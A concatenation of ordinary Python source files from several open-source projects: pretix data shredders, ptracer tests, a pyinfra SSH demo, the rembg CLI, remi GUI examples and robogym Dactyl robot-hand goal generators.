if 'invoice_data' in d and not isinstance(d['invoice_data'], bool):
for field in d['invoice_data']:
if d['invoice_data'][field]:
d['invoice_data'][field] = '█'
le.data = json.dumps(d)
le.shredded = True
le.save(update_fields=['data', 'shredded'])
class QuestionAnswerShredder(BaseDataShredder):
verbose_name = _('Question answers')
identifier = 'question_answers'
description = _('This will remove all answers to questions, as well as logged changes to them.')
def generate_files(self) -> List[Tuple[str, str, str]]:
yield 'question-answers.json', 'application/json', json.dumps({
'{}-{}'.format(op.order.code, op.positionid): AnswerSerializer(op.answers.all(), many=True).data
for op in OrderPosition.all.filter(order__event=self.event).prefetch_related('answers')
}, indent=4)
@transaction.atomic
def shred_data(self):
QuestionAnswer.objects.filter(orderposition__order__event=self.event).delete()
for le in self.event.logentry_set.filter(action_type="pretix.event.order.modified").exclude(data=""):
d = le.parsed_data
if 'data' in d:
for i, row in enumerate(d['data']):
for f in row:
if f not in ('attendee_name', 'attendee_email'):
d['data'][i][f] = '█'
le.data = json.dumps(d)
le.shredded = True
le.save(update_fields=['data', 'shredded'])
class InvoiceShredder(BaseDataShredder):
verbose_name = _('Invoices')
identifier = 'invoices'
tax_relevant = True
description = _('This will remove all invoice PDFs, as well as any of their text content that might contain '
'personal data from the database. Invoice numbers and totals will be conserved.')
def generate_files(self) -> List[Tuple[str, str, str]]:
for i in self.event.invoices.filter(shredded=False):
if not i.file:
invoice_pdf_task.apply(args=(i.pk,))
i.refresh_from_db()
i.file.open('rb')
yield 'invoices/{}.pdf'.format(i.number), 'application/pdf', i.file.read()
i.file.close()
@transaction.atomic
def shred_data(self):
for i in self.event.invoices.filter(shredded=False):
if i.file:
i.file.delete()
i.shredded = True
i.introductory_text = "█"
i.additional_text = "█"
i.invoice_to = "█"
i.payment_provider_text = "█"
i.save()
i.lines.update(description="█")
class CachedTicketShredder(BaseDataShredder):
verbose_name = _('Cached ticket files')
identifier = 'cachedtickets'
description = _('This will remove all cached ticket files. No download will be offered.')
def generate_files(self) -> List[Tuple[str, str, str]]:
pass
@transaction.atomic
def shred_data(self):
CachedTicket.objects.filter(order_position__order__event=self.event).delete()
CachedCombinedTicket.objects.filter(order__event=self.event).delete()
class PaymentInfoShredder(BaseDataShredder):
verbose_name = _('Payment information')
identifier = 'payment_info'
tax_relevant = True
description = _('This will remove payment-related information. Depending on the payment method, all data will be '
'removed or personal data only. No download will be offered.')
def generate_files(self) -> List[Tuple[str, str, str]]:
pass
@transaction.atomic
def shred_data(self):
provs = self.event.get_payment_providers()
for obj in OrderPayment.objects.filter(order__event=self.event):
pprov = provs.get(obj.provider)
if pprov:
pprov.shred_payment_info(obj)
for obj in OrderRefund.objects.filter(order__event=self.event):
pprov = provs.get(obj.provider)
if pprov:
pprov.shred_payment_info(obj)
@receiver(register_data_shredders, dispatch_uid="shredders_builtin")
def register_core_shredders(sender, **kwargs):
return [
EmailAddressShredder,
PhoneNumberShredder,
AttendeeInfoShredder,
InvoiceAddressShredder,
QuestionAnswerShredder,
InvoiceShredder,
CachedTicketShredder,
PaymentInfoShredder,
WaitingListShredder
]
``` |
{
"source": "0xflotus/ptracer",
"score": 2
} |
#### File: ptracer/tests/test_ptracer.py
```python
import errno
import os
import re
import threading
import unittest
try:
from unittest import mock
except ImportError:
import mock
import ptracer
eperm_mock = mock.Mock(
side_effect=OSError(errno.EPERM, 'Operation not permitted'))
class TestPtracer(unittest.TestCase):
@mock.patch('ptracer.ptrace.attach_and_wait', eperm_mock)
def test_ptracer__fail_01(self):
with self.assertRaisesRegexp(ptracer.PtracerError,
'Operation not permitted'):
with ptracer.context(lambda s: None):
f = open('/dev/zero', 'r')
f.close()
@mock.patch('ptracer.ptrace.syscall', eperm_mock)
def test_ptracer__fail_02(self):
with self.assertRaisesRegexp(ptracer.PtracerError,
'Operation not permitted'):
with ptracer.context(lambda s: None):
f = open('/dev/zero', 'r')
f.close()
@mock.patch('ptracer.ptrace.syscall_exit', eperm_mock)
def test_ptracer__fail_03(self):
with self.assertRaisesRegexp(ptracer.PtracerError,
'Operation not permitted'):
with ptracer.context(lambda s: None):
f = open('/dev/zero', 'r')
f.close()
@mock.patch('ptracer.ptrace.ptrace.getsiginfo', eperm_mock)
def test_ptracer__fail_04(self):
with self.assertRaisesRegexp(ptracer.PtracerError,
'Operation not permitted'):
with ptracer.context(lambda s: None):
f = open('/dev/zero', 'r')
f.close()
def test_ptracer_basic(self):
syscalls = []
with ptracer.context(syscalls.append):
f = open('/dev/zero', 'r')
f.close()
self.assertGreater(len(syscalls), 0)
def test_ptracer_filter_01(self):
syscalls = []
def _trace(pattern):
syscalls[:] = []
with ptracer.context(syscalls.append, filter=pattern):
f = open('/dev/null', 'w')
f.close()
f = open('/dev/zero', 'r')
f.close()
try:
open('/dev/nonexistent', 'r')
except IOError:
pass
_trace([
ptracer.SysCallPattern(name=re.compile('op.*'))
])
self.assertEqual(len(syscalls), 3)
_trace([
ptracer.SysCallPattern(
name=re.compile('openat'),
args=[
None,
b'/dev/null'
]
)
])
self.assertEqual(len(syscalls), 1)
_trace([
ptracer.SysCallPattern(
name=re.compile('openat'),
args=[
None,
b'/dev/null'
]
)
])
self.assertEqual(len(syscalls), 1)
_trace([
ptracer.SysCallPattern(
name=re.compile('openat'),
args=[
None,
None,
lambda arg: arg.value & os.O_WRONLY
]
)
])
self.assertEqual(len(syscalls), 1)
_trace([
ptracer.SysCallPattern(
name=re.compile('op.*'),
result=lambda res: res.value < 0
)
])
self.assertEqual(len(syscalls), 1)
def test_ptracer_threading(self):
syscalls = []
def _thread():
f = open('/dev/zero', 'r')
f.close()
flt = ptracer.SysCallPattern(
name='openat',
args=[
None,
b'/dev/zero'
]
)
with ptracer.context(syscalls.append, filter=flt):
thread = threading.Thread(target=_thread)
thread.start()
thread.join()
self.assertEqual(len(syscalls), 1)
``` |
{
"source": "0xflotus/pyheck",
"score": 2
} |
#### File: 0xflotus/pyheck/noxfile.py
```python
import nox
@nox.session
def python(session):
session.install("pytest", "maturin", "sphinx")
session.install(".", "--no-build-isolation")
session.run("make", "test", external=True)
``` |
{
"source": "0xflotus/pyinfra",
"score": 2
} |
#### File: examples/ssh_demo/ssh_demo1.py
```python
from pyinfra import host, inventory
from pyinfra.operations import files, server
SUDO = True
# update the /etc/hosts file
def update_hosts_file(name, ip):
name = name.replace('@vagrant/', '')
files.line(
{'Add hosts to /etc/hosts'},
'/etc/hosts',
r' {}.example.com '.format(name),
replace='{} {}.example.com {}'.format(ip, name, name),
)
# ensure all hosts are added to each /etc/hosts file
inv = inventory.get_group('@vagrant')
for item in inv:
update_hosts_file(item.name, item.fact.ipv4_addresses['eth0'])
if host.name == '@vagrant/two':
server.hostname(
{'Set the hostname for two'},
'two.example.com',
)
if host.name == '@vagrant/one':
server.hostname(
{'Set the hostname for one'},
'one.example.com',
)
server.shell(
{'Generate vagrant ssh key'},
'sudo -u vagrant ssh-keygen -t rsa -C <EMAIL> '
'-b 4096 -N "" -q -f /home/vagrant/.ssh/id_rsa',
)
files.get(
{'Download id_rsa.pub from one'},
'/home/vagrant/.ssh/id_rsa.pub',
'/tmp/one_vagrant_id_rsa.pub',
)
``` |
{
"source": "0xflotus/pymatriz",
"score": 3
} |
#### File: pymatriz/pymatriz/exceptions.py
```python
class ApiException(Exception):
"""
Represent a controlled exception raised by the library.
"""
def __init__(self, msg):
self.msg = msg
def __str__(self):
return self.msg
class ParsingException(Exception):
"""
Represent a controlled exception raised by the library.
"""
def __init__(self, msg):
self.msg = msg
def __str__(self):
return self.msg
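# Usage sketch (illustrative only):
#   try:
#       raise ApiException("invalid credentials")
#   except ApiException as exc:
#       print(exc)  # -> invalid credentials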
``` |
{
"source": "0xflotus/rembg",
"score": 3
} |
#### File: rembg/cmd/cli.py
```python
import argparse
import glob
import imghdr
import io
import os
import numpy as np
from PIL import Image
from ..bg import remove
def main():
ap = argparse.ArgumentParser()
ap.add_argument(
"-m",
"--model",
default="u2net",
type=str,
choices=("u2net", "u2netp"),
help="The model name.",
)
ap.add_argument(
"-p", "--path", nargs="+", help="Path of a file or a folder of files.",
)
ap.add_argument(
"-o",
"--output",
nargs="?",
default="-",
type=argparse.FileType("wb"),
help="Path to the output png image.",
)
ap.add_argument(
"input",
nargs="?",
default="-",
type=argparse.FileType("rb"),
help="Path to the input image.",
)
args = ap.parse_args()
r = lambda i: i.buffer.read() if hasattr(i, "buffer") else i.read()
w = lambda o, data: o.buffer.write(data) if hasattr(o, "buffer") else o.write(data)
if args.path:
full_paths = [os.path.abspath(path) for path in args.path]
files = set()
for path in full_paths:
if os.path.isfile(path):
files.add(path)
else:
full_paths += glob.glob(path + "/*")
for fi in files:
if imghdr.what(fi) is None:
continue
with open(fi, "rb") as input:
with open(os.path.splitext(fi)[0] + ".out.png", "wb") as output:
w(output, remove(r(input), args.model))
else:
w(args.output, remove(r(args.input), args.model))
if __name__ == "__main__":
main()
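# Example invocations (illustrative; assumes this module is run directly, while
# real installs typically expose a `rembg` entry point):
#   python cli.py -p ./photos             # writes <name>.out.png next to each image
#   python cli.py input.png -o output.png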
``` |
{
"source": "0xflotus/remi",
"score": 3
} |
#### File: remi/examples/matplotlib_app.py
```python
""" This simple example shows how to display a matplotlib plot image.
The MatplotImage widget is addressed by url requests that point to
a specific method. The displayed image url points to "get_image_data".
By passing an additional parameter "update_index" we inform the browser
about an image change, forcing the image to update.
"""
import io
import time
import threading
import random
import remi.gui as gui
from remi import start, App
from matplotlib.figure import Figure
from matplotlib.backends.backend_agg import FigureCanvasAgg
class MatplotImage(gui.Image):
ax = None
def __init__(self, **kwargs):
super(MatplotImage, self).__init__("/%s/get_image_data?update_index=0" % id(self), **kwargs)
self._buf = None
self._buflock = threading.Lock()
self._fig = Figure(figsize=(4, 4))
self.ax = self._fig.add_subplot(111)
self.redraw()
def redraw(self):
canv = FigureCanvasAgg(self._fig)
buf = io.BytesIO()
canv.print_figure(buf, format='png')
with self._buflock:
if self._buf is not None:
self._buf.close()
self._buf = buf
i = int(time.time() * 1e6)
self.attributes['src'] = "/%s/get_image_data?update_index=%d" % (id(self), i)
super(MatplotImage, self).redraw()
def get_image_data(self, update_index):
with self._buflock:
if self._buf is None:
return None
self._buf.seek(0)
data = self._buf.read()
return [data, {'Content-type': 'image/png'}]
class MyApp(App):
def __init__(self, *args):
super(MyApp, self).__init__(*args)
def main(self):
wid = gui.VBox(width=320, height=320, margin='0px auto')
wid.style['text-align'] = 'center'
bt = gui.Button('Data', width=100, height=30)
bt.style['margin'] = '10px'
bt.onclick.connect(self.on_button_pressed)
self.plot_data = [0, 1]
self.mpl = MatplotImage(width=250, height=250)
self.mpl.style['margin'] = '10px'
self.mpl.ax.set_title("test")
self.mpl.ax.plot(self.plot_data)
self.mpl.redraw()
wid.append(bt)
wid.append(self.mpl)
return wid
def on_button_pressed(self, widget):
self.plot_data.append(random.random())
self.mpl.ax.plot(self.plot_data)
self.mpl.redraw()
if __name__ == "__main__":
start(MyApp, debug=True, address='0.0.0.0', port=0)
```
#### File: remi/examples/root_widget_change_app.py
```python
import remi.gui as gui
from remi import start, App
import os
class MyApp(App):
def __init__(self, *args):
res_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'res')
# static_file_path can be an array of strings allowing to define
# multiple resource paths where the resources will be placed
super(MyApp, self).__init__(*args, static_file_path=res_path)
def main(self):
#creating two "pages" widgets to be shown alternatively
lbl = gui.Label("Page 2. Press the button to change the page.", style={'font-size':'20px'})
bt2 = gui.Button("change page")
page2 = gui.HBox(children=[lbl, bt2], style={'margin':'0px auto', 'background-color':'lightgray'})
lbl = gui.Label("Page 1. Press the button to change the page.", style={'font-size':'20px'})
bt1 = gui.Button("change page")
page1 = gui.VBox(children=[lbl, bt1], style={'width':'300px', 'height':'200px', 'margin':'0px auto', 'background-color':'white'})
bt1.onclick.connect(self.set_different_root_widget, page2)
bt2.onclick.connect(self.set_different_root_widget, page1)
# returning the root widget
return page1
def set_different_root_widget(self, emitter, page_to_be_shown):
self.set_root_widget(page_to_be_shown)
if __name__ == "__main__":
# starts the webserver
start(MyApp, address='0.0.0.0', port=0, start_browser=True, username=None, password=<PASSWORD>)
``` |
{
"source": "0xflotus/robogym",
"score": 3
} |
#### File: dactyl/goals/face_curriculum.py
```python
import typing
import numpy as np
from robogym.envs.dactyl.common import cube_utils
from robogym.goal.goal_generator import GoalGenerator
from robogym.utils import rotation
class FaceCurriculumGoal(GoalGenerator):
""" 'Face curriculum' goal generation. Generate goals that specify a fully aligned cube at a
desired orientation with the specified face being up.
"""
def __init__(
self,
mujoco_simulation,
success_threshold: dict,
face_geom_names: typing.List[str],
goal_directions: typing.Optional[typing.List[str]] = None,
round_target_face: bool = True,
p_face_flip: float = 0.25,
):
"""
Create new FaceCurriculumGoal object
:param mujoco_simulation: A SimulationInterface object for a mujoco simulation considered
:param success_threshold: Dictionary of threshold levels for cube orientation and face
rotation, for which we consider the cube "aligned" with the goal
:param face_geom_names: Names of 6 face geoms of the cube for which we measure the rotation
:param goal_directions: Whether to rotate faces only clockwise, counterclockwise or both
:param round_target_face: Whether target face rotations should be only round angles
(multiplies of pi/2) or not
:param p_face_flip: If the cube is aligned, what is the probability of flipping the cube
vs rotating the face
"""
super().__init__()
assert len(face_geom_names) in {2, 6}, "Only supports full cube or face cube"
self.mujoco_simulation = mujoco_simulation
self.success_threshold = success_threshold
self.face_geom_names = face_geom_names
if goal_directions is None:
self.goal_directions = ["cw", "ccw"]
else:
self.goal_directions = goal_directions
self.round_target_face = round_target_face
self.p_face_flip = p_face_flip
self.goal_quat_for_face = cube_utils.face_up_quats(
mujoco_simulation.sim, "cube:cube:rot", self.face_geom_names
)
def next_goal(self, random_state, current_state):
""" Generate a new goal from current cube goal state """
cube_pos = current_state["cube_pos"]
cube_quat = current_state["cube_quat"]
cube_face = current_state["cube_face_angle"]
# Success threshold parameters
face_threshold = self.success_threshold["cube_face_angle"]
rot_threshold = self.success_threshold["cube_quat"]
self.mujoco_simulation.clone_target_from_cube()
self.mujoco_simulation.align_target_faces()
rounded_current_face = rotation.round_to_straight_angles(cube_face)
# Face aligned - are faces in the current cube aligned within the threshold
current_face_diff = rotation.normalize_angles(cube_face - rounded_current_face)
face_aligned = np.linalg.norm(current_face_diff, axis=-1) < face_threshold
# Z aligned - is there a cube face looking up within the rotation threshold
if len(self.face_geom_names) == 2:
z_aligned = rotation.rot_z_aligned(cube_quat, rot_threshold)
else: # len(self.face_geom_names) == 6
z_aligned = rotation.rot_xyz_aligned(cube_quat, rot_threshold)
# Do reorientation - with some probability, just reorient the cube
do_reorientation = random_state.uniform() < self.p_face_flip
# Rotate face - should we rotate face or reorient the cube
rotate_face = face_aligned and z_aligned and not do_reorientation
if rotate_face:
# Chose index from the geoms that is highest on the z axis
face_to_shift = cube_utils.face_up(
self.mujoco_simulation.sim, self.face_geom_names
)
# Rotate given face by a random angle and return both, new rotations and an angle
goal_face, delta_angle = cube_utils.rotated_face_with_angle(
cube_face,
face_to_shift,
random_state,
self.round_target_face,
directions=self.goal_directions,
)
if len(self.face_geom_names) == 2:
self.mujoco_simulation.rotate_target_face(face_to_shift, delta_angle)
else:
self.mujoco_simulation.rotate_target_face(
face_to_shift // 2, face_to_shift % 2, delta_angle
)
goal_quat = rotation.round_to_straight_quat(cube_quat)
else: # need to flip cube
# Goal for face rotations is just aligning them
goal_face = rounded_current_face
# Make the goal so that a given face is straight up
candidates = list(range(len(self.face_geom_names)))
face_to_shift = random_state.choice(candidates)
z_quat = cube_utils.uniform_z_aligned_quat(random_state)
face_up_quat = self.goal_quat_for_face[face_to_shift]
goal_quat = rotation.quat_mul(z_quat, face_up_quat)
goal_quat = rotation.quat_normalize(goal_quat)
return {
"cube_pos": cube_pos,
"cube_quat": goal_quat,
"cube_face_angle": goal_face,
"goal_type": "rotation" if rotate_face else "flip",
}
def current_state(self):
""" Extract current cube goal state """
cube_pos = np.zeros(3)
return {
"cube_pos": cube_pos,
"cube_quat": self.mujoco_simulation.get_qpos("cube_rotation"),
"cube_face_angle": self.mujoco_simulation.get_face_angles("cube"),
}
def relative_goal(self, goal_state, current_state):
"""
Calculate a difference in the 'goal space' between current state and the target goal
"""
return {
# Cube pos does not count
"cube_pos": np.zeros(goal_state["cube_pos"].shape),
# Quaternion difference of a rotation
"cube_quat": rotation.quat_difference(
goal_state["cube_quat"], current_state["cube_quat"]
),
# Angle differences
"cube_face_angle": rotation.normalize_angles(
goal_state["cube_face_angle"] - current_state["cube_face_angle"]
),
}
def goal_distance(self, goal_state, current_state):
""" Distance from the current goal to the target state. """
relative_goal = self.relative_goal(goal_state, current_state)
goal_distance = {
"cube_pos": 0.0,
"cube_quat": rotation.quat_magnitude(relative_goal["cube_quat"]),
"cube_face_angle": np.linalg.norm(relative_goal["cube_face_angle"]),
}
return goal_distance
def goal_types(self) -> typing.Set[str]:
return {"rotation", "flip"}
```
#### File: dactyl/goals/fixed_fair_scramble.py
```python
import logging
from robogym.envs.dactyl.goals.face_cube_solver import FaceCubeSolverGoal
logger = logging.getLogger(__name__)
class FixedFairScrambleGoal(FaceCubeSolverGoal):
"""
Generates a series of goals to apply a "fair scramble" to a fully solved Rubik's cube.
The fair scramble was generated using the WCA app and was not cherry-picked:
https://www.worldcubeassociation.org/regulations/scrambles/
Goals are generated in a way to always rotate the top face.
"""
def _generate_solution_sequence(self, cube):
solution = "L2 U2 R2 B D2 B2 D2 L2 F' D' R B F L U' F D' L2"
return self._normalize_actions(solution.split())
```
#### File: dactyl/goals/shadow_hand_reach_fingertip_pos.py
```python
import numpy as np
from numpy.random import RandomState
from robogym.envs.dactyl.reach import ReachSimulation
from robogym.goal.goal_generator import GoalGenerator
from robogym.robot.shadow_hand.hand_forward_kinematics import FINGERTIP_SITE_NAMES
from robogym.utils.dactyl_utils import actuated_joint_range
class FingertipPosGoal(GoalGenerator):
"""
Goal generation to sample random qpos within actuator control range.
"""
def __init__(
self, mujoco_simulation: ReachSimulation, goal_simulation: ReachSimulation
):
"""
Create new FingertipPosGoal object
"""
self.mujoco_simulation = mujoco_simulation
self.goal_simulation = goal_simulation
self.goal_joint_pos = mujoco_simulation.shadow_hand.observe().joint_positions()
super().__init__()
def next_goal(self, random_state: RandomState, current_state: dict) -> dict:
"""
Goal is defined as fingertip position.
We sample next goal by sampling actuator control within control range then use
forward kinematic to calculate fingertip position.
"""
sim = self.mujoco_simulation.mj_sim
goal_sim = self.goal_simulation.mj_sim
# We need to update control range and joint range for goal simulation because
# they can be changed by randomizers.
goal_sim.model.jnt_range[:] = sim.model.jnt_range
goal_sim.model.actuator_ctrlrange[:] = sim.model.actuator_ctrlrange
# Sample around current pose of the fingers in joint space.
joint_limits = actuated_joint_range(sim)
joint_range = joint_limits[:, 1] - joint_limits[:, 0]
goal_joint_pos = random_state.normal(
loc=self.goal_joint_pos, scale=0.1 * joint_range
)
goal_joint_pos = np.clip(goal_joint_pos, joint_limits[:, 0], joint_limits[:, 1])
# replace state to ensure reachability with current model
self.goal_simulation.set_qpos("robot0:hand_joint_angles", goal_joint_pos)
self.goal_simulation.forward()
# take a few steps to avoid goals that are impossible due to contacts
for steps in range(2):
self.goal_simulation.shadow_hand.set_position_control(
self.goal_simulation.shadow_hand.denormalize_position_control(
self.goal_simulation.shadow_hand.zero_control(),
relative_action=True,
)
)
self.goal_simulation.step()
self.goal_joint_pos = (
self.goal_simulation.shadow_hand.observe().joint_positions()
)
return {
"fingertip_pos": self._get_fingertip_position(self.goal_simulation),
}
def current_state(self) -> dict:
""" Extract current cube goal state """
return {"fingertip_pos": self._get_fingertip_position(self.mujoco_simulation)}
def relative_goal(self, goal_state: dict, current_state: dict) -> dict:
return {
"fingertip_pos": goal_state["fingertip_pos"]
- current_state["fingertip_pos"]
}
def goal_distance(self, goal_state: dict, current_state: dict) -> dict:
relative_goal = self.relative_goal(goal_state, current_state)
return {"fingertip_pos": np.linalg.norm(relative_goal["fingertip_pos"])}
@staticmethod
def _get_fingertip_position(simulation: ReachSimulation):
"""
Get absolute fingertip positions in mujoco frame.
"""
fingertip_pos = np.array(
[
simulation.mj_sim.data.get_site_xpos(f"robot0:{site}")
for site in FINGERTIP_SITE_NAMES
]
)
fingertip_pos = fingertip_pos.flatten()
return fingertip_pos
```
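The core of `next_goal` above is a local random walk in joint space: sample a configuration around the current one, clip it to the actuated joint limits, and let the goal simulation settle before reading the fingertip sites. A minimal numpy sketch of just that sampling step (shapes and names are assumptions, not the robogym API):
```python
import numpy as np

def sample_goal_joint_pos(
    current_qpos: np.ndarray,
    joint_limits: np.ndarray,  # shape (n_joints, 2): [low, high] per joint
    random_state: np.random.RandomState,
) -> np.ndarray:
    # Gaussian perturbation scaled by 10% of each joint's range, as in next_goal.
    joint_range = joint_limits[:, 1] - joint_limits[:, 0]
    proposal = random_state.normal(loc=current_qpos, scale=0.1 * joint_range)
    # Clip back into the admissible joint range.
    return np.clip(proposal, joint_limits[:, 0], joint_limits[:, 1])

# Two fake joints with limits [0, 1] and [-1, 1]:
rs = np.random.RandomState(0)
q = sample_goal_joint_pos(np.array([0.5, 0.0]), np.array([[0.0, 1.0], [-1.0, 1.0]]), rs)
assert q.shape == (2,) and np.all(q >= [0.0, -1.0]) and np.all(q <= [1.0, 1.0])
```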
#### File: dactyl/goals/unconstrained_cube_solver.py
```python
import logging
import typing
import numpy as np
from robogym.envs.dactyl.goals.rubik_cube_solver import RubikCubeSolver
from robogym.utils import rotation
logger = logging.getLogger(__name__)
class UnconstrainedCubeSolver(RubikCubeSolver):
"""
Generates a series of goals to solve a Rubik's cube.
Goals are not constrained to apply to a particular face.
"""
def __init__(
self,
mujoco_simulation,
success_threshold: typing.Dict[str, float],
face_geom_names: typing.List[str],
num_scramble_steps: int,
):
"""
Creates new UnconstrainedCubeSolver object
"""
self.success_threshold = success_threshold
super().__init__(
mujoco_simulation=mujoco_simulation,
face_geom_names=face_geom_names,
num_scramble_steps=num_scramble_steps,
)
def _is_goal_met(self, current_face_state, threshold):
"""
Check if current face state matches current goal state.
"""
face_diff = rotation.normalize_angles(current_face_state - self.goal_face_state)
return np.linalg.norm(face_diff, axis=-1) < threshold
def next_goal(self, random_state, current_state):
""" Generates a new goal from current cube goal state """
cube_pos = current_state["cube_pos"]
cube_quat = current_state["cube_quat"]
cube_face = current_state["cube_face_angle"]
# Success threshold parameters
face_threshold = self.success_threshold["cube_face_angle"]
# Check if current state already meets goal state.
if self._is_goal_met(cube_face, face_threshold):
# Step forward in goal sequence to get next goal.
self._step_goal()
# Directly rotate the face indicated by the goal action.
goal_action = self._get_goal_action()
face_to_shift = goal_action.face_idx
self.mujoco_simulation.target_model.rotate_face(
face_to_shift // 2, face_to_shift % 2, goal_action.face_angle
)
# align cube quat for visualization purposes, has no effect on goal being met
cube_quat = rotation.quat_normalize(rotation.round_to_straight_quat(cube_quat))
return {
"cube_pos": cube_pos,
"cube_quat": cube_quat,
"cube_face_angle": self.goal_face_state,
"goal_type": "rotation",
}
def relative_goal(self, goal_state, current_state):
"""
Calculate a difference in the 'goal space' between current state and the target goal
"""
goal_type = goal_state["goal_type"]
assert goal_type == "rotation", 'unknown goal_type "{}"'.format(goal_type)
return {
# Cube pos does not count
"cube_pos": np.zeros(goal_state["cube_pos"].shape),
# Quaternion difference of a rotation
"cube_quat": np.zeros(goal_state["cube_quat"].shape),
# Angle differences
"cube_face_angle": rotation.normalize_angles(
goal_state["cube_face_angle"] - current_state["cube_face_angle"]
),
}
def goal_distance(self, goal_state, current_state):
""" Distance from the current goal to the target state. """
relative_goal = self.relative_goal(goal_state, current_state)
goal_distance = {
"cube_pos": 0.0,
"cube_quat": 0.0, # qpos has no effect on whether we consider goal achieved
"cube_face_angle": np.linalg.norm(relative_goal["cube_face_angle"]),
"steps_to_solve": len(self.goal_sequence)
- (self.goal_step % len(self.goal_sequence)),
}
return goal_distance
def goal_reachable(self, goal_state, current_state):
""" Check if goal is in reach from current state."""
relative_goal = self.relative_goal(goal_state, current_state)
face_rotation_angles = relative_goal["cube_face_angle"]
goal_type = goal_state["goal_type"]
assert goal_type == "rotation", 'unknown goal_type "{}"'.format(goal_type)
eps = 1e-6
rounded_rotation_angles = rotation.round_to_straight_angles(
np.abs(rotation.normalize_angles(face_rotation_angles))
)
rotated_faces = list(np.where(rounded_rotation_angles > eps)[0])
goal_face_idx = self._get_goal_action().face_idx
return rounded_rotation_angles[
goal_face_idx
] < np.pi / 2 + eps and rotated_faces in ([], [goal_face_idx])
```
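`goal_reachable` above rounds the outstanding face rotations to the nearest straight angle and accepts the goal only if the goal face alone still needs to move, by at most a quarter turn. A self-contained numpy sketch of that test (assumed inputs, no robogym imports):
```python
import numpy as np

def rotation_goal_reachable(face_rotation_angles: np.ndarray, goal_face_idx: int) -> bool:
    eps = 1e-6
    # Normalize angles to (-pi, pi], then round magnitudes to multiples of pi/2.
    normalized = (face_rotation_angles + np.pi) % (2 * np.pi) - np.pi
    rounded = np.round(np.abs(normalized) / (np.pi / 2)) * (np.pi / 2)
    rotated_faces = list(np.where(rounded > eps)[0])
    # Reachable iff only the goal face is rotated, and by at most a quarter turn.
    return rounded[goal_face_idx] < np.pi / 2 + eps and rotated_faces in ([], [goal_face_idx])

assert rotation_goal_reachable(np.array([0.0, 0.0, np.pi / 2]), goal_face_idx=2)
assert not rotation_goal_reachable(np.array([np.pi / 2, 0.0, np.pi / 2]), goal_face_idx=2)
```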
#### File: envs/dactyl/reach.py
```python
import functools
import typing
import attr
import numpy as np
from robogym.envs.dactyl.observation.reach import (
GoalFingertipPosObservation,
GoalIsAchievedObservation,
)
from robogym.envs.dactyl.observation.shadow_hand import (
MujocoShadowhandAbsoluteFingertipsObservation,
MujocoShadowHandJointPosObservation,
MujocoShadowHandJointVelocityObservation,
)
from robogym.goal.goal_generator import GoalGenerator
from robogym.mujoco.mujoco_xml import MujocoXML
from robogym.mujoco.simulation_interface import SimulationInterface
from robogym.observation.goal import GoalObservationProvider
from robogym.observation.mujoco import MujocoObservationProvider, ObservationProvider
from robogym.robot.shadow_hand.hand_forward_kinematics import FINGERTIP_SITE_NAMES
from robogym.robot.shadow_hand.mujoco.mujoco_shadow_hand import MuJoCoShadowHand
from robogym.robot_env import ObservationMapValue as omv
from robogym.robot_env import RobotEnv, RobotEnvConstants, RobotEnvParameters
from robogym.wrappers import dactyl, randomizations, util
DEFAULT_NOISE_LEVELS: typing.Dict[str, dict] = {
"fingertip_pos": {"uncorrelated": 0.001, "additive": 0.001},
}
NO_NOISE_LEVELS: typing.Dict[str, dict] = {
key: {} for key in DEFAULT_NOISE_LEVELS.keys()
}
@attr.s(auto_attribs=True)
class ReachEnvParameters(RobotEnvParameters):
""" Parameters of the shadow hand reach env - possible to change for each episode. """
pass
@attr.s(auto_attribs=True)
class ReachEnvConstants(RobotEnvConstants):
""" Parameters of the shadow hand reach env - same for all episodes. """
success_threshold: dict = {"fingertip_pos": 0.025}
# If specified, freeze all other fingers.
active_finger: typing.Optional[str] = None
# Overwrite the following constants regarding rewards.
successes_needed: int = 50
max_timesteps_per_goal: int = 150
class ReachSimulation(SimulationInterface):
"""
Simulation interface for shadow hand reach env.
"""
# Just a floor
FLOOR_XML = "floor/basic_floor.xml"
# Target fingertip sites.
TARGET_XML = "shadowhand_reach/target.xml"
# Robot hand xml
HAND_XML = "robot/shadowhand/main.xml"
# XML with default light
LIGHT_XML = "light/default.xml"
def __init__(self, sim):
super().__init__(sim)
self.enable_pid()
self.shadow_hand = MuJoCoShadowHand(self)
@classmethod
def build(cls, n_substeps: int = 10):
"""Construct a ShadowHandReachSimulation object.
:param n_substeps: (int) sim.nsubsteps, num of substeps
:return: a ShadowHandReachSimulation object with properly constructed sim.
"""
xml = MujocoXML()
xml.add_default_compiler_directive()
xml.append(
MujocoXML.parse(cls.FLOOR_XML).set_named_objects_attr(
"floor", tag="body", pos=[1, 1, 0]
)
)
target = MujocoXML.parse(cls.TARGET_XML)
colors = [
[1.0, 0.0, 0.0, 1.0],
[0.0, 1.0, 0.0, 1.0],
[0.0, 0.0, 1.0, 1.0],
[1.0, 1.0, 0.0, 1.0],
[1.0, 0.0, 1.0, 1.0],
]
for site, color in zip(FINGERTIP_SITE_NAMES, colors):
target.set_named_objects_attr(
f"target_{site}",
pos=[0.5, 0.5, 0.0],
type="sphere",
rgba=color,
size=0.005,
)
xml.append(target)
xml.append(
MujocoXML.parse(cls.HAND_XML)
.add_name_prefix("robot0:")
.set_named_objects_attr(
"robot0:hand_mount",
tag="body",
pos=[1.0, 1.25, 0.15],
euler=[np.pi / 2, 0, np.pi],
)
.remove_objects_by_name("robot0:annotation:outer_bound")
# Remove hand base free joint so that hand is immovable
.remove_objects_by_name("robot0:hand_base")
)
xml.append(MujocoXML.parse(cls.LIGHT_XML))
simulation = cls(xml.build(nsubsteps=n_substeps))
# Move fingers out of the way.
simulation.shadow_hand.set_position_control(
simulation.shadow_hand.denormalize_position_control(
simulation.shadow_hand.zero_control()
)
)
for _ in range(20):
simulation.step()
return simulation
class ReachEnv(RobotEnv[ReachEnvParameters, ReachEnvConstants, ReachSimulation]):
"""
Shadow hand reach environment: the goal is to place each fingertip at its target
position.
"""
def _build_observation_providers(self):
"""
Initialize observation providers for the environment.
"""
providers: typing.Dict[str, ObservationProvider] = {
"mujoco": MujocoObservationProvider(self.mujoco_simulation),
"goal": GoalObservationProvider(lambda: self.goal_info()),
}
return providers
def _default_observation_map(self):
return {
"qpos": omv({"mujoco": MujocoShadowHandJointPosObservation}),
"qvel": omv({"mujoco": MujocoShadowHandJointVelocityObservation}),
"fingertip_pos": omv(
{"mujoco": MujocoShadowhandAbsoluteFingertipsObservation}
),
"goal_fingertip_pos": omv({"goal": GoalFingertipPosObservation}),
"is_goal_achieved": omv({"goal": GoalIsAchievedObservation}),
}
